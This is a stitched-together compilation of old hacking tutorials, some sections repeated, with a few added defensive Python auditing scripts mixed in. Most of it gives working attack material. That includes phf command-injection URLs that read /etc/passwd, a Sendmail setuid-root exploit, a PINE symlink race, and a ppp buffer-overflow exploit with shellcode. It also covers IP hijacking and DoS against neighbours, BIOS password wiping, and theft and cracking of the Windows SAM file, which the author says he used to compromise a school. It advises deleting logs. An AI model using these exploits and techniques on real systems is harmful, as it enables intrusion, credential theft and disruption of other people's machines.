This is all the information you will need for now. I suggest you either keep your DOS/command prompt window open or copy and paste the information somewhere; to copy, right-click the window, select text, and click once.
3) Changing Your IP Address: To change your IP address, first pick any IP you like out of your IP range and remember it or write it down. It is usually a good idea to make sure the IP is dead [except for what we are going to do later on], so just ping it via "ping x.x.x.x" and if it times out then you can use it. Now go to My Computer, then Control Panel; in Control Panel select Network Connections and pick your active connection, probably Local Area Connection or your ISP name. Open that connection by double-clicking on the icon in Network Connections, then select Properties under the General tab. In the new window that pops up select Internet Protocol [TCP/IP] and click Properties (it's under the General tab). In this new window select the General tab and choose "use the following ip address"; for the IP address enter the IP you would like to use [the one you picked from your subnet earlier], and for the subnet mask enter the subnet mask you got when you ran ipconfig /all; the same goes for the default gateway. Now select "use the following dns server addresses" and enter the information you got earlier, then just click OK. Test that it worked: try to refresh a website, and if it works you know everything is okay and you are connected. To make sure the change worked, type ipconfig again and the IP address should have changed to your new one.
4) DDoS And DoS Protection: If your firewall shows that you are being DDoSed (this is usually when you are constantly getting attempted UDP connections several times a second from either the same IP address or multiple IP addresses [DDoS]), you can protect yourself by changing your IP address via the method I described above.
5) Webservers And Other Services: If you know someone on your IP range is running a webserver and he or she has pissed you off, or you just like messing around, you can steal their IP address so any DNS going to that IP will show your site instead, because you would be running a webserver yourself. To steal an IP is basically to use the changing IP address method above and pick an IP that someone who is running a webserver has in use. Often you will be able to keep that IP at least for some time; other times you won't be able to use it, so just keep trying until it works. You yourself will need to have a web server on the same port with your message. You can do this with other services too; you can also DoS or DDoS the IP address you are trying to steal to kick him off the net.

Here is the best way to crack the BIOS password in Win 95/98:
Follow the steps below:
1) Boot up Windows.
2) Go to the DOS prompt, or go to the command prompt directly from the Windows start-up menu.
3) Type the command at the prompt: "debug" (without quotes).
4) Type the following lines now exactly as given:
o 70 10
o 71 20
quit
exit
5) Exit from the DOS prompt and restart the machine.
Password protection gone! Enjoy.
PS: I tested this in Award BIOS. There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers and everything will be fine.
I have not found any other trouble if the codes are used.
To be on the safe side, just back up your data.
The use of this code is entirely at your risk. It worked fine for me.

Hacking Webpage - The Ultimate Guide
Well, Psychotic wrote one of the most helpful unix text files in cyberspace, but with the mail that we received after the release of our famous 36 page Unix Bible we realised that unix isn't for everybody, so we decided that we should write on another aspect of hacking. Virtual Circuit and Psychotic are proud to release "Hacking Webpages With a few Other Techniques." We will discuss a few various ways of hacking webpages and getting root. We are also going to interview and question other REAL hackers on the subjects.
Getting the Password File Through FTP
Ok well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need to learn a little about the password file...
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That's the main part of the file.
root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp
This is another example of a password file, only this one has one little difference, it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker(both explained later in the text). Below is another example of a shadowed password file:
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Shadowed password files have an "x" in the place of a password, or sometimes they are disguised as an * as well.
Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it.
Cracking a password file isn't as complicated as it would seem, although the files vary from system to system.
1. The first step that you would take is to download or copy the file.
2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker, there are a few OK ones out there. I recommend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose (ASCII, caps, lowercase, and numeric letters may also be added). We will be releasing our password file to the public soon; it will be called Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation.
3. You then start up the cracker and follow the directions that it gives you.
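A defender reads the same records to find the weak spots before anyone cracks them. The following is an added example, not code from the original text or its authors: it parses passwd-style lines and reports unshadowed hashes, empty password fields, malformed records and extra UID 0 accounts. SAMPLE is built from the page's own illustrations plus one constructed 'guest' entry, and every function name is my own.

```python
"""Audit passwd-style records the way a defender reviews them: which accounts
are shadowed, which still expose a crypt(3) hash in field 2, which have an
empty password field, which records are malformed, and which share UID 0.

Added example, not part of the original text.  SAMPLE is constructed from the
page's own illustrations plus one made-up 'guest' entry; the names below are
my own and do not come from the page.
"""
from dataclasses import dataclass
from typing import Dict, List

# Field-2 markers meaning "the real hash lives in /etc/shadow (or is disabled)"
PLACEHOLDERS = {"x", "*", "!", "!!", "*LK*", "NP", "*NP*"}


@dataclass
class PasswdEntry:
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd_line(line: str) -> PasswdEntry:
    """Parse one colon-separated record.

    passwd(5) has seven fields; the page's first sample omits the shell, so a
    short record is padded with '' rather than rejected.  A non-numeric UID or
    GID raises ValueError, which is how the page's 'root:User:d7Bdg:...' line
    is caught: it is not a valid passwd record at all.
    """
    fields = line.rstrip("\n").split(":")
    if len(fields) < 4:
        raise ValueError(f"too few fields: {line!r}")
    fields += [""] * (7 - len(fields))
    name, pw, uid, gid, gecos, home, shell = fields[:7]
    return PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell)


def is_shadowed(entry: PasswdEntry) -> bool:
    """True when field 2 is a placeholder or a locked ('!'/'*'-prefixed) hash."""
    pw = entry.passwd
    return pw in PLACEHOLDERS or pw.startswith(("!", "*"))


def audit_passwd(text: str) -> Dict[str, List[str]]:
    """Classify every record of a passwd file; values are account names."""
    report: Dict[str, List[str]] = {
        "malformed": [], "exposed_hash": [], "empty_password": [],
        "shadowed": [], "duplicate_uid0": [],
    }
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            entry = parse_passwd_line(line)
        except ValueError:
            report["malformed"].append(line.split(":")[0])
            continue
        if entry.passwd == "":
            report["empty_password"].append(entry.name)   # login with no password
        elif is_shadowed(entry):
            report["shadowed"].append(entry.name)
        else:
            report["exposed_hash"].append(entry.name)     # crackable offline
        if entry.uid == 0 and entry.name != "root":
            report["duplicate_uid0"].append(entry.name)   # a second superuser
    return report


# Constructed sample: records copied from the page's illustrations, plus a
# made-up 'guest' account with an empty password field.
SAMPLE = """\
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
smtp:x:0:0:mail daemon user:/:
nobody:x:60001:60001:uid no body:/:
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
guest::500:500:Guest:/home/guest:/bin/sh
"""

if __name__ == "__main__":
    for category, names in audit_passwd(SAMPLE).items():
        print(f"{category:15s} {', '.join(names) or '-'}")
```

Note that the page's own 'smtp:x:0:0' entry is a second UID 0 account, which is exactly the kind of finding this audit surfaces.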
The PHF Technique
Well I wasn't sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it.
The phf technique is by far the easiest way of getting a password file(although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link:
http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
You replace the webpage_goes_here with the domain. So if you were trying to get the pw file for www.webpage.com you would type:
http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
and that's it! You just sit back and copy the file(if it works).
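On the defending side, the request strings shown in the "Browser Hack" section and here are exactly what to hunt for in web server logs. The following is an added example, not code from the original text: it parses Common Log Format lines (constructed samples that reuse the page's own request strings) and flags phf/finger requests whose parameters carry shell metacharacters or name a sensitive file; all names are my own.

```python
"""Detection logic for the CGI command-injection requests described in the
'Browser Hack' and 'PHF Technique' sections, run over web server access logs.

Added example, not part of the original text.  The log lines below are
constructed (Common Log Format, documentation IP ranges); the request strings
are the ones the page shows.  Only GET query strings are inspected, so a form
submitted by POST would need the request body as well.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Common Log Format: host ident user [time] "request" status bytes
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)')

# CGI programs with a known shell-escape history (phf is the page's example)
SUSPECT_SCRIPTS = ("/cgi-bin/phf", "/cgi-bin/finger", "/cgi-bin/test-cgi")
# Shell metacharacters that never belong in a phf/finger lookup value
META_RE = re.compile(r"[\n\r;|`&]|\$\(")
SENSITIVE = ("/etc/passwd", "/etc/shadow", ".rhosts")


def analyse_request(request: str) -> Optional[Dict[str, object]]:
    """Inspect one 'METHOD target HTTP/x' request line.

    Returns None for benign requests, otherwise a finding with the reasons and
    an 'injection' flag that is True when the query carries shell
    metacharacters or names a sensitive file.
    """
    parts = request.split(" ")
    if len(parts) < 2:
        return None
    url = urlsplit(parts[1])
    path = unquote(url.path)
    # parse_qsl decodes once; the extra unquote catches %250a-style double encoding
    values = [unquote(v) for _, v in parse_qsl(url.query, keep_blank_values=True)]

    meta = any(META_RE.search(v) for v in values)
    hits = [s for s in SENSITIVE if any(s in v for v in values)]
    reasons: List[str] = []
    if path in SUSPECT_SCRIPTS:
        reasons.append(f"request to historically vulnerable CGI {path}")
    if meta:
        reasons.append("shell metacharacter inside a query parameter")
    if hits:
        reasons.append("query references " + ", ".join(hits))
    if not reasons:
        return None
    return {"path": path, "reasons": reasons, "injection": meta or bool(hits)}


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run analyse_request over CLF lines; lines that do not parse are skipped."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue
        host, when, request, status, _size = m.groups()
        finding = analyse_request(request)
        if finding:
            finding.update({"host": host, "time": when, "status": int(status)})
            findings.append(finding)
    return findings


# Constructed log: a normal page view, a plain phf lookup, the page's phf
# string, the same string double-encoded, and the finger-box query from the
# 'Browser Hack' section as it would appear in a GET request.
LOG = """\
203.0.113.7 - - [10/Oct/1997:13:55:36 -0700] "GET /index.html HTTP/1.0" 200 2326
203.0.113.7 - - [10/Oct/1997:13:55:40 -0700] "GET /cgi-bin/phf?Qname=Jones HTTP/1.0" 200 512
198.51.100.9 - - [10/Oct/1997:13:56:02 -0700] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1881
198.51.100.9 - - [10/Oct/1997:13:57:11 -0700] "GET /cgi-bin/phf?Qalias=x%250a/bin/cat%2520/etc/passwd HTTP/1.0" 200 1881
198.51.100.9 - - [10/Oct/1997:13:58:30 -0700] "GET /cgi-bin/finger?name=nobody%40nowhere.org+%3B+/bin/mail+me%40junk.org+%3C+/etc/passwd HTTP/1.0" 200 300
"""

if __name__ == "__main__":
    for f in scan_log(LOG.splitlines()):
        tag = "INJECTION" if f["injection"] else "watch"
        print(f"{tag:9s} {f['host']} {f['path']}: {'; '.join(f['reasons'])}")
```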
Telnet and Exploits
Well, exploits are the best way of hacking webpages, but they are also more complicated than hacking through ftp or using the phf. Before you can set up an exploit you must first have a telnet proggie; there are many different clients, and you can just do a net search and find everything you need.
It's best to get an account with your target (if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each separately. I'm going to list a few below, but the list of exploits is endless.
This exploit is known as the Sendmail v8.8.4 exploit. It creates a suid program /tmp/x that calls a shell as root. This is how you set it up:
cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0);
setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
And now on to another exploit. I'm going to display the pine exploit through linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile.
Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts(for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.
This was written by Sean B. Hamor. For this example, hamors is the victim while catluvr is the attacker:
hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
hamors (23 19:09) litterbox:~> pine

catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 ++
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
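Both write-ups above leave artifacts a system administrator can check for: the Sendmail procedure depends on a setuid-root binary left in /tmp, and the PINE race ends with a world-writable ~user/.rhosts containing "+ +". The following is an added example, not part of the original text, that builds a constructed directory tree inside a temporary directory and audits it for those two artifacts; all paths and function names are my own.

```python
"""Hunt for the two artifacts the Sendmail and PINE write-ups above leave
behind: a setuid binary dropped in a world-writable directory, and a
~user/.rhosts that is world-writable, a symlink, or contains a '+ +' wildcard.

Added example, not part of the original text.  It builds a throwaway tree
under a temp directory (constructed sample data) instead of touching the real
system; every path and function name here is my own.
"""
import os
import stat
import tempfile
from typing import Dict, List


def rhosts_findings(path: str) -> List[str]:
    """Explain why a .rhosts file is dangerous; [] means it looks sane."""
    findings: List[str] = []
    if os.path.islink(path):
        findings.append("is a symbolic link")          # the PINE lockfile trick
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"writable by group/other (mode {mode:o})")
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            fields = line.split()
            if not fields or fields[0].startswith("#"):
                continue
            host = fields[0]
            user = fields[1] if len(fields) > 1 else ""
            if host == "+" or user == "+":             # any host and/or any user
                findings.append(f"line {lineno}: wildcard entry {line.strip()!r}")
    return findings


def setuid_in_dir(directory: str) -> List[str]:
    """Regular files below directory carrying the setuid or setgid bit."""
    hits: List[str] = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            p = os.path.join(root, name)
            st = os.lstat(p)
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(p)
    return sorted(hits)


def build_sample(base: str) -> None:
    """Create a constructed tree mirroring the page's two scenarios."""
    tmp = os.path.join(base, "tmp")
    os.makedirs(tmp)
    dropped = os.path.join(tmp, "x")                   # stands in for /tmp/x
    with open(dropped, "w") as fh:
        fh.write("#!/bin/ksh\n")
    os.chmod(dropped, 0o4755)                          # the exploit's chmod 4755
    with open(os.path.join(tmp, "notes.txt"), "w") as fh:
        fh.write("harmless\n")
    # hamors: the victim's .rhosts after the race; catluvr: a sane one
    for user, content, mode in (("hamors", "+ +\n", 0o666),
                                ("catluvr", "litterbox.org catluvr\n", 0o600)):
        home = os.path.join(base, "home", user)
        os.makedirs(home)
        rh = os.path.join(home, ".rhosts")
        with open(rh, "w") as fh:
            fh.write(content)
        os.chmod(rh, mode)


def run_audit(base: str) -> Dict[str, object]:
    """Audit base/tmp for setuid files and every base/home/*/.rhosts."""
    report: Dict[str, object] = {
        "setuid": [os.path.relpath(p, base) for p in setuid_in_dir(os.path.join(base, "tmp"))],
        "rhosts": {},
    }
    home_root = os.path.join(base, "home")
    for user in sorted(os.listdir(home_root)):
        rh = os.path.join(home_root, user, ".rhosts")
        if os.path.lexists(rh):
            report["rhosts"][user] = rhosts_findings(rh)
    return report


def demo() -> Dict[str, object]:
    """Build the sample tree in a temp dir, audit it, and clean up."""
    with tempfile.TemporaryDirectory() as base:
        build_sample(base)
        return run_audit(base)


if __name__ == "__main__":
    result = demo()
    print("setuid files:", result["setuid"])
    for user, findings in result["rhosts"].items():
        print(f"{user}/.rhosts:", findings or "ok")
```

On a real host the same two functions would be pointed at /tmp and at each entry of /etc/passwd's home field.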
Now on to another one; this will be the last one that I'm going to show. Exploitation script for the ppp vulnerability as described by no one to date; this is NOT FreeBSD-SA-96:15. Works on FreeBSD as tested. Mess with the numbers if it doesn't work. This is how you set it up:
#include
#include
#include
#define BUFFER_SIZE 156 /* size of the buffer to overflow */
#define OFFSET -290 /* number of bytes to jump after the start of the buffer */
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
main(int argc, char *argv[])
{
char *buf = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */
int i,j;
buf = malloc(4096);
/* fill start of buffer with nops */
i = BUFFER_SIZE-strlen(execshell);
memset(buf, 0x90, i);
ptr = buf + i;
/* place exploit code into the buffer */
for(i = 0; i < strlen(execshell); i++)
*ptr++ = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (104/4); i++)
*addr_ptr++ = get_esp() + OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
setenv("HOME", buf, 1);
execl("/usr/sbin/ppp", "ppp", NULL);
}
Now that you've gotten root, "what's next?" Well, the choice is up to you, but I would recommend changing the password before you delete or change anything. To change their password all you have to do is login via telnet and login with your new account. Then you just type: passwd and it will ask you for the old password first, followed by the new one. Now only you will have the new pw and that should last for a while. You can now upload your pages, delete all the logs and just plain do your worst things.
Hacking Webpages

Getting The Password File Through FTP:

Ok, well, one of the easiest ways of getting super-user access is through anonymous ftp access into a webpage. First you need to learn a little about the password file:

```
Root:User:d7Bdg:1n2HG2:1127:20:superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
```

This is an example of a regular encrypted password file. The superuser entry is the part that gives you root; that's the main part of the file.

```
root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp
```

This is another example of a password file, only this one has one little difference: it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password, which causes problems for the password cracker and dictionary maker. Below is another example of a shadowed password file:

```
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
```

Shadowed password files have an "x" in the place of a password, or sometimes they are disguised as an "*" as well. Now that you know a little more about what the actual password file looks like, you should be able to identify a normal encrypted password file from a shadowed one, so we can now go on to talk about how to crack it.

Cracking a password file isn't as complicated as it would seem, although the files vary from system to system:

1) Take the password file: download or copy it.
2) Find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker, there are a few ok ones out there; i recommend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file: when you start a cracking prog you will be asked to find the password file, that's where a dictionary maker comes in. You can download one from nearly every hacker page on the net; a dictionary maker finds all the possible letter combinations with the alphabet that you choose (ASCII, caps, lowercase, and numeric letters may also be added).
3) You then start up the cracker and follow the directions that it gives you.

The PHF Technique:

The phf technique is by far the easiest way of getting a password file (although it doesn't work 95% of the time). To do the phf all you do is open a browser and type in the following link: http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd, replacing webpage_goes_here with the domain. So if you were trying to get the pw file for www.webpage.com you would type: http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
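As an added example (not from the tutorial), here is the check a defender would run over a password file in the seven-field format shown above: it parses the entries and reports hashes still visible in the world-readable file instead of being shadowed, empty password fields, and any uid 0 account besides root (the tutorial's own `smtp:x:0:0:...` line triggers that one). The sample lines come from the examples above plus one constructed `guest` entry.

```python
"""Audit a passwd-format file for exposed hashes and other risky entries.

Added example, not code from the tutorial. It parses the seven-field format
(name:password:uid:gid:gecos:home:shell) shown in the text and reports
entries a defender would want to look at.
"""
from dataclasses import dataclass

# Markers meaning "the real hash lives in the shadow file": the tutorial's x and *,
# plus ! and !!, which Linux uses for locked accounts.
SHADOW_MARKERS = {"x", "*", "!", "!!"}

# Constructed sample: lines from the tutorial's examples plus one made-up "guest"
# entry with an empty password field.
SAMPLE_PASSWD = """\
root:x:0:1:Superuser:/:
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
ftp:x:202:102:Anonymous ftp:/u1/ftp:
smtp:x:0:0:mail daemon user:/:
guest::1500:20:Guest:/home/guest:/bin/sh
"""


@dataclass
class PasswdEntry:
    name: str
    password: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text):
    """Parse passwd-format text into PasswdEntry objects, skipping blanks and comments."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            raise ValueError(f"line {lineno}: expected at least 4 colon-separated fields")
        fields += [""] * (7 - len(fields))  # tolerate short lines like the tutorial's ftpadmin entry
        name, password, uid, gid, gecos, home, shell = fields[:7]
        try:
            entries.append(PasswdEntry(name, password, int(uid), int(gid), gecos, home, shell))
        except ValueError:
            raise ValueError(f"line {lineno}: uid/gid are not numeric: {uid!r}/{gid!r}")
    return entries


def is_shadowed(entry):
    """True when the password field only points at the shadow file."""
    return entry.password in SHADOW_MARKERS


def audit(entries):
    """Return (account, finding) pairs for entries that need attention."""
    findings = []
    for e in entries:
        if e.password == "":
            findings.append((e.name, "empty password field: login needs no password"))
        elif not is_shadowed(e):
            findings.append((e.name, "hash visible in world-readable passwd file (not shadowed)"))
        if e.uid == 0 and e.name != "root":
            findings.append((e.name, "uid 0 account other than root"))
    return findings


if __name__ == "__main__":
    for account, finding in audit(parse_passwd(SAMPLE_PASSWD)):
        print(f"{account:10s} {finding}")
```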
HOW TO GET ANY WINDOWS PASSWORD

ok..... here are the full details.....

This works whether it's Windows 2000 or Windows XP or Windows XP SP1 or SP2 or Windows Server 2003....

This works even if syskey encryption is employed...

If it is a FAT filesystem...
Just copy the sam file like stated in the first post to an empty floppy disk and take it home. I'll tell you what to do with it later... DON'T DELETE THE ORIGINAL SAM FILE, just remove its attributes. The sam file is a file called SAM with no extension. YOU MUST ALSO GET.... a file called SYSTEM which is in the same folder as SAM. Both files have no extensions...

If it is NTFS....

You have to download a program called NTFSPro.... it allows you to read from ntfs drives... the demo version allows read only, the full version is read-write.... You use the program to create an unbootable disk (so you will still need another bootable disk and an empty disk) that has the required files to access NTFS.

Use the boot disk to get into dos, then use the disks created with ntfspro to be able to access the filesystem, then copy the SAM and SYSTEM files to another empty disk to take home....

AT HOME: you have to get a program called SAMInside. It doesn't matter if it is the demo version. SAMInside will open the SAM file and extract all the user account information and their passwords, including administrator. SAMInside will ask for the SYSTEM file too if the computer you took the SAM file from has syskey enabled. Syskey encrypts the SAM file; SAMInside uses the SYSTEM file to decrypt the SAM file. After SAMInside finishes, you still see user accounts and hashes beside them. The hashes are the encoded passwords. Use SAMInside to export the accounts and their hashes as a pwdump file into another program, called LophtCrack. It is currently in version 5, it is named LC5. The previous version, LC4, is just as good. You need the full or cracked version of the program. LC5 uses a brute force method by trying all possible combinations of letters, numbers, and unprintable characters to find the correct password from the hashes in the pwdump file imported into it from SAMInside. This process of trying all passwords might take 5 minutes if the password is easy, up to a year if the password is long and hard (really really hard). LC5 however, unlike LC4, is almost 100 times faster. Both can be configured to try dictionary and common words before using all possible combinations of everything. Once the correct password is found, it will display the passwords in clear beside each account, including administrator.

I use this method so many times. I've compromised the whole school computer infrastructure. LC4 usually took between 1 second and 10 minutes to find the passwords because they were common words found in any English dictionary. I haven't used LC5 yet.

If there is anything unclear, anything I overlooked, please tell me so that I can turn this into a very easy to follow tutorial to help anybody crack any Windows pass.
Programs needed:

* SAMInside (doesn't matter which version or if demo)
* LC4 or LC5 (lophtcrack) (must be full version)
* NTFSPro (doesn't matter if demo)
* any bootdisk maker

Cracked or full version software can be found on any warez site. If you don't know what that is or where to get the programs, post a message and I'll tell you or give them to you.

P.S: I might not keep track of this forum, because I'm going to create a new topic and post the tutorial there. If you want to post, please post there.
Netbios Hacking

A - How The Hack Works

Netbios is a tcp/ip protocol [this means that it runs over the internet]; it is used to share files and printers. The port that netbios runs under is 139. It is easy to hack because windows has installed programs to exploit this vulnerability; although there aren't as many people open to this attack as in the past, there are still a few.

B - Getting Started

First of all you need netbios enabled on your box. To do this in xp go to your dial-up connection properties and click on tcp/ip properties, click the advanced tab, then wins, and enable it down the bottom, then restart. Mind, this is for xp only; it should be enabled automatically on any other version. Next find a target. The best way to do this is to get mirc, this is a good irc client for winblowz; get this up and running and use /dns <username> to get an ip address. Then open up command prompt or ms-dos and type nbtstat -A ip address, hit enter and wait. You should get 1 of 2 screens:

1 - host not found, [or something like that]

2 -

```
C:\>nbtstat -A 192.168.0.99

Local Area Connection:
Node ip_address: [192.168.0.99] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    SERVER         <00>  UNIQUE      Registered
    SLASHER        <00>  GROUP       Registered
    SERVER         <03>  UNIQUE      Registered
    SERVER         <20>  UNIQUE      Registered
    SLASHER        <1E>  GROUP       Registered
    SLASHER        <1D>  UNIQUE      Registered
    MSBROWSE       <01>  GROUP       Registered
    SERVER         <01>  UNIQUE      Registered

    MAC Address = 00-02-E3-05-AE-ED
```

Well, this tells all. See the <20> hex: this is what we are looking for, this lets us know that this box is open and hackable. There are a few exceptions to this rule, but 90% of the time this is the case. If you can't find a host the first time just keep trying, there are lots of open comps out there. Now that we have found an open host let's start hacking. To view the host's shares [that's what we are hacking] type net view \\ip address; you should get a list something like this:

```
C:\>net view \\192.168.0.99
